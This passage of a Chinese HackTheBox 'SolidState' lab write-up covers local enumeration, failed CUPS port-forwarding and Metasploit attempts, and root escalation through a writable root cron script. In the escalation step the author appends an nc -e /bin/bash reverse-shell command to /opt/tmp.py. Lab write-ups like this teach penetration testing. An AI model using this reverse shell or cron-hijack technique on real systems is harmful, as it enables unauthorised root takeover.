class="line">mindy</span><br><span class="line">id</span><br><span class="line">uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)</span><br></pre></td></tr></table></figure>

<h1 id="走歪的路"><a href="#走歪的路" class="headerlink" title="走歪的路"></a>走歪的路</h1><p>ssh 登录上去之后，用 linpeas.sh 做本机信息收集，发现在 631 端口有个 web 服务</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name  </span><br><span class="line">tcp 0 0 0.0.0.0:22 0.0.0.0:_ LISTEN -  </span><br><span class="line">tcp 0 0 127.0.0.1:631 0.0.0.0:_ LISTEN -</span><br></pre></td></tr></table></figure>

<p>curl 看了下，感觉有戏,<code>cups 2.2.1</code></p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="section"># curl 127.0.0.1:631</span></span><br><span class="line"></span><br><span class="line">% Total % Received % Xferd Average Speed Time Time Time Current</span><br><span class="line">Dload Upload Total Spent Left Speed</span><br><span class="line">100 2362 <span class="xml"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">HTML</span>&gt;</span></span> 0 0 0 --:--:-- --:--:-- --:--:-- 0</span><br><span class="line"></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span></span><br><span class="line">  <span class="xml"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span></span><br><span class="line">...</span><br><span class="line"><span class="code">    &lt;title&gt;Home - CUPS 2.2.1&lt;/title&gt;</span></span><br><span class="line">  <span class="xml"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span></span><br><span class="line">  <span class="xml"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span></span><br><span class="line"><span class="code">    &lt;div class="header"&gt;</span></span><br><span class="line"><span class="code">      &lt;ul&gt;</span></span><br><span class="line"><span class="code">	&lt;li&gt;&lt;a href="http://www.cups.org/" target="_blank"&gt;CUPS.org&lt;/a&gt;&lt;/li&gt;</span></span><br><span class="line"><span class="code">	&lt;li&gt;&lt;a class="active" href="/"&gt;Home&lt;/a&gt;&lt;/li&gt;</span></span><br><span class="line"><span class="code">	&lt;li&gt;&lt;a href="/admin"&gt;Administration&lt;/a&gt;&lt;/li&gt;</span></span><br><span class="line"><span class="code">	&lt;li&gt;&lt;a href="/classes/"&gt;Classes&lt;/a&gt;&lt;/li&gt;</span></span><br><span class="line"><span class="code">	&lt;li&gt;&lt;a href="/help/"&gt;Help&lt;/a&gt;&lt;/li&gt;</span></span><br><span class="line"><span class="code">	&lt;li&gt;&lt;a href="/jobs/"&gt;Jobs&lt;/a&gt;&lt;/li&gt;</span></span><br><span class="line"><span class="code">	&lt;li&gt;&lt;a href="/printers/"&gt;Printers&lt;/a&gt;&lt;/li&gt;</span></span><br><span class="line"><span class="code">      &lt;/ul&gt;</span></span><br><span class="line"><span class="code">    &lt;/div&gt;</span></span><br><span class="line"><span class="code">    &lt;div class="body"&gt;</span></span><br><span class="line"><span class="code">      &lt;div class="row"&gt;</span></span><br><span class="line"><span class="code">	&lt;h1&gt;CUPS 2.2.1&lt;/h1&gt;</span></span><br><span class="line"><span class="code">	&lt;p&gt;CUPS is the standards-based, open source printing system developed by &lt;a href="http://www.apple.com/"&gt;Apple Inc.&lt;/a&gt; for macOS&lt;sup&gt;®&lt;/sup&gt; and other UNIX&lt;sup&gt;®&lt;/sup&gt;-like operating systems.&lt;/p&gt;</span></span><br><span class="line"><span class="code">      &lt;/div&gt;</span></span><br><span class="line"><span class="code">      &lt;div class="row"&gt;</span></span><br><span class="line"><span class="code">	&lt;div class="thirds"&gt;</span></span><br><span class="line"><span class="code">	  &lt;h2&gt;CUPS for Users&lt;/h2&gt;</span></span><br><span class="line"><span class="code">	  &lt;p&gt;&lt;a href="help/overview.html"&gt;Overview of CUPS&lt;/a&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="code">	  &lt;p&gt;&lt;a href="help/options.html"&gt;Command-Line Printing and Options&lt;/a&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="code">	  &lt;p&gt;&lt;a href="http://www.cups.org/lists.php?LIST=cups"&gt;User Forum&lt;/a&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="code">	&lt;/div&gt;</span></span><br><span class="line"><span class="code">	&lt;div class="thirds"&gt;</span></span><br><span class="line"><span class="code">	  &lt;h2&gt;CUPS for Administrators&lt;/h2&gt;</span></span><br><span class="line"><span class="code">	  &lt;p&gt;&lt;a href="admin"&gt;Adding Printers and Classes&lt;/a&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="code">	  &lt;p&gt;&lt;a href="help/policies.html"&gt;Managing Operation Policies&lt;/a&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="code">	  &lt;p&gt;&lt;a href="help/network.html"&gt;Using Network Printers&lt;/a&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="code">	  &lt;p&gt;&lt;a href="help/man-cupsd.conf.html"&gt;cupsd.conf Reference&lt;/a&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="code">	&lt;/div&gt;</span></span><br><span class="line"><span class="code">	&lt;div class="thirds"&gt;</span></span><br><span class="line"><span class="code">	  &lt;h2&gt;CUPS for Developers&lt;/h2&gt;</span></span><br><span class="line"><span class="code">	  &lt;p&gt;&lt;a href="help/api-overview.html"&gt;Introduction to CUPS Programming&lt;/a&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="code">	  &lt;p&gt;&lt;a href="help/api-cups.html"&gt;CUPS API&lt;/a&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="code">	  &lt;p&gt;&lt;a href="help/api-filter.html"&gt;Filter and Backend Programming&lt;/a&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="code">	  &lt;p&gt;&lt;a href="help/api-httpipp.html"&gt;HTTP and IPP APIs&lt;/a&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="code">	  &lt;p&gt;&lt;a href="http://www.cups.org/lists.php?LIST=cups-devel"&gt;Developer Forum&lt;/a&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="code">	&lt;/div&gt;</span></span><br><span class="line"><span class="code">      &lt;/div&gt;</span></span><br><span class="line"><span class="code">    &lt;/div&gt;</span></span><br><span class="line"><span class="code">    &lt;div class="footer"&gt;CUPS and the CUPS logo are trademarks of &lt;a href="http://www.apple.com"&gt;Apple Inc.&lt;/a&gt; Copyright © 2007-2015 Apple Inc. All rights reserved.&lt;/div&gt;</span></span><br><span class="line">  <span class="xml"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span></span><br><span class="line"> 100  2362    0     0   531k      0 --:--:-- --:--:-- --:--:--  576k</span><br></pre></td></tr></table></figure>

<p>于是想端口转发到本地来搞, 这里采用知道创宇的<code>rtcp</code></p>
<p>端口转发</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">在 A 服务器上运行：</span><br><span class="line">./rtcp.py c:localhost:631 c:10.10.16.122:630</span><br><span class="line"></span><br><span class="line">在 B 服务器上运行：</span><br><span class="line">./rtcp.py l:630 l:631</span><br><span class="line"></span><br><span class="line"><span class="code">    表示在本地监听了 10001 与 10002 两个端口，这样，这两个端口就可以互相传输数据了</span></span><br></pre></td></tr></table></figure>

<p>转发失败，不知道什么原因。。<br><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1588926099446-06788da3-a721-4b8f-931a-11b8a777b8eb.png#align=left&display=inline&height=330&margin=%5Bobject%20Object%5D&name=image.png&originHeight=660&originWidth=1008&size=71148&status=done&style=none&width=504" alt="image.png"><br>另一方面，用 msf 自带的提权模块也有一些结果</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msf5 post(multi/recon/local<span class="emphasis">_exploit_</span>suggester) &gt; run</span><br><span class="line"></span><br><span class="line">[+] 10.10.10.51 - exploit/linux/local/network<span class="emphasis">_manager_</span>vpnc<span class="emphasis">_username_</span>priv_esc: The service is running, but could not be validated.</span><br><span class="line">[+] 10.10.10.51 - exploit/linux/local/pkexec: The service is running, but could not be validated.</span><br></pre></td></tr></table></figure>

<p>尝试了，全部失败。</p>
<p>查了下 walkthrough，网上的使用的是 nc 直接反弹 shell，将<code>tmp.py</code>的内容改成反弹 shell，等待定时任务执行直接提权。</p>
<h1 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h1><p>刚刚得到的是一个受限的 shell-<code>rbash</code>。<br><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1588858957254-4923071a-4a96-4e4a-910a-45d5151f1723.png#align=left&display=inline&height=453&margin=%5Bobject%20Object%5D&name=image.png&originHeight=963&originWidth=1587&size=209705&status=done&style=none&width=746" alt="image.png"></p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">[+] Users with console</span><br><span class="line">james:x:1000:1000:james:/home/james/:/bin/bash</span><br><span class="line">mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br></pre></td></tr></table></figure>

<p><code>rbash</code>中很多命令都没有，而且不能用<code>/</code>，因此使用 linux/smtp/apache_james_exe 模块来反弹完整的 shell, 启动模块后，登录 mindy 用户的 ssh 即可收到 shell<br>机器信息</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="section"># uname -a</span></span><br><span class="line"></span><br><span class="line">Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux</span><br><span class="line"></span><br><span class="line"><span class="section"># cat /etc/issue</span></span><br><span class="line"></span><br><span class="line">Debian GNU/Linux 9 \n \l</span><br></pre></td></tr></table></figure>

<p>那么拿到 meterpreter 的 shell 之后，看到<code>/opt/tmp.py</code>文件是 root 权限，里面的内容可以加以利用</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">#!/usr/bin/env python</span></span><br><span class="line">import os</span><br><span class="line">import sys</span><br><span class="line">try:</span><br><span class="line">os.system('rm -r /tmp/\* ')</span><br><span class="line">except:</span><br><span class="line">sys.exit()</span><br></pre></td></tr></table></figure>

<p>追加一条反弹 shell 的代码</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo "os.system('/bin/nc -e /bin/bash 10.10.16.122 99')" &gt;&gt; /opt/tmp.py</span><br></pre></td></tr></table></figure>

<p>等待定时任务启动，nc 监听即可得到 root</p>
<h1 id="反思总结"><a href="#反思总结" class="headerlink" title="反思总结"></a>反思总结</h1><ul>
<li>实际上，当我拿到 root 权限后，我才发现，user 用户下输入<code>crontab -l</code>是无法看到<code>root</code>用户的定时任务的。因此也就无怪乎 linpeas.sh 找到下面这个定时任务了。只能用<code>ps aux</code>配合上<code>ls -al</code>直觉推断一波了</li>
</ul>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="quote">&gt; &gt; crontab -l</span></span><br><span class="line"></span><br><span class="line"><span class="section"># Edit this file to introduce tasks to be run by cron.</span></span><br><span class="line"></span><br><span class="line"><span class="section">#</span></span><br><span class="line"></span><br><span class="line"><span class="section"># Each task to run has to be defined through a single line</span></span><br><span class="line"></span><br><span class="line"><span class="section"># indicating with different fields when the task will be run</span></span><br><span class="line"></span><br><span class="line"><span class="section"># and what command to run for the task</span></span><br><span class="line"></span><br><span class="line"><span class="section">#</span></span><br><span class="line"></span><br><span class="line"><span class="section"># To define the time you can provide concrete values for</span></span><br><span class="line"></span><br><span class="line"><span class="section"># minute (m), hour (h), day of month (dom), month (mon),</span></span><br><span class="line"></span><br><span class="line"><span class="section"># and day of week (dow) or use '\*' in these fields (for 'any').</span></span><br><span class="line"></span><br><span class="line"><span class="section"># Notice that tasks will be started based on the cron's system</span></span><br><span class="line"></span><br><span class="line"><span class="section"># daemon's notion of time and timezones.</span></span><br><span class="line"></span><br><span class="line"><span class="section">#</span></span><br><span class="line"></span><br><span class="line"><span class="section"># Output of the crontab jobs (including errors) is sent through</span></span><br><span class="line"></span><br><span class="line"><span class="section"># email to the user the crontab file belongs to (unless redirected).</span></span><br><span class="line"></span><br><span class="line"><span class="section">#</span></span><br><span class="line"></span><br><span class="line"><span class="section"># For example, you can run a backup of all your user accounts</span></span><br><span class="line"></span><br><span class="line"><span class="section"># at 5 a.m every week with:</span></span><br><span class="line"></span><br><span class="line"><span class="section"># 0 5 \* \* 1 tar -zcf /var/backups/home.tgz /home/</span></span><br><span class="line"></span><br><span class="line"><span class="section">#</span></span><br><span class="line"></span><br><span class="line"><span class="section"># For more information see the manual pages of crontab(5) and cron(8)</span></span><br><span class="line"></span><br><span class="line"><span class="section">#</span></span><br><span class="line"></span><br><span class="line"><span class="section"># m h dom mon dow command</span></span><br><span class="line"></span><br><span class="line"><span class="emphasis">_/3 _</span> \<span class="emphasis">* \*</span> \* python /opt/tmp.py</span><br></pre></td></tr></table></figure>

<ul>
<li>一开始，在 tmp.py 里加入了反弹 shel 的代码后，直接执行后发现，反弹的并不是 root 权限。</li>
<li>看来 linux 的权限是“谁运行就是谁的权限”</li>
<li>TRY HARDER</li>
</ul>
<h1 id="reference"><a href="#reference" class="headerlink" title="reference"></a>reference</h1><ul>
<li><a href="https://www.58ssl.com/ftp/1897.html" target="_blank" rel="noopener">SMTP、POP3、NNTP、FTP、HTTP 服务器常用指令 - SSL 之家</a></li>
<li><a href="https://www.howtoing.com/rbash-a-restricted-bash-shell-explained-with-practical-examples/" target="_blank" rel="noopener">rbash - 一个受限的 Bash Shell 用实际示例说明</a></li>
<li><a href="https://github.com/knownsec/rtcp" target="_blank" rel="noopener">https://github.com/knownsec/rtcp</a></li>
<li><a href="https://0x00sec.org/t/htb-solidstate-write-up/5129" target="_blank" rel="noopener">https://0x00sec.org/t/htb-solidstate-write-up/5129</a></li>
</ul>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/04/30/yuque/HackTheBox%EF%BC%9APostman%E7%AC%94%E8%AE%B0/" rel="next" title="HackTheBox：Postman笔记">
                <i class="fa fa-chevron-left"></i> HackTheBox：Postman笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/05/18/yuque/HackTheBox%EF%BC%9ALegacy%E7%AC%94%E8%AE%B0/" rel="prev" title="HackTheBox：Legacy笔记">
                HackTheBox：Legacy笔记 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Unc1e</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">19</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#信息收集"><span class="nav-number">1.</span> <span class="nav-text">信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Nmap"><span class="nav-number">1.1.</span> <span class="nav-text">Nmap</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#JAMES-Admin-Tool"><span class="nav-number">1.2.</span> <span class="nav-text">JAMES Admin Tool</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#拿-user-权限"><span class="nav-number">2.</span> <span class="nav-text">拿 user 权限</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#john-的邮箱"><span class="nav-number">2.1.</span> <span class="nav-text">john 的邮箱</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mindy-的邮箱"><span class="nav-number">2.2.</span> <span class="nav-text">mindy 的邮箱</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#走歪的路"><span class="nav-number">3.</span> <span class="nav-text">走歪的路</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#提权"><span class="nav-number">4.</span> <span class="nav-text">提权</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#反思总结"><span class="nav-number">5.</span> <span class="nav-text">反思总结</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#reference"><span class="nav-number">6.</span> <span class="nav-text">reference</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Unc1e</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
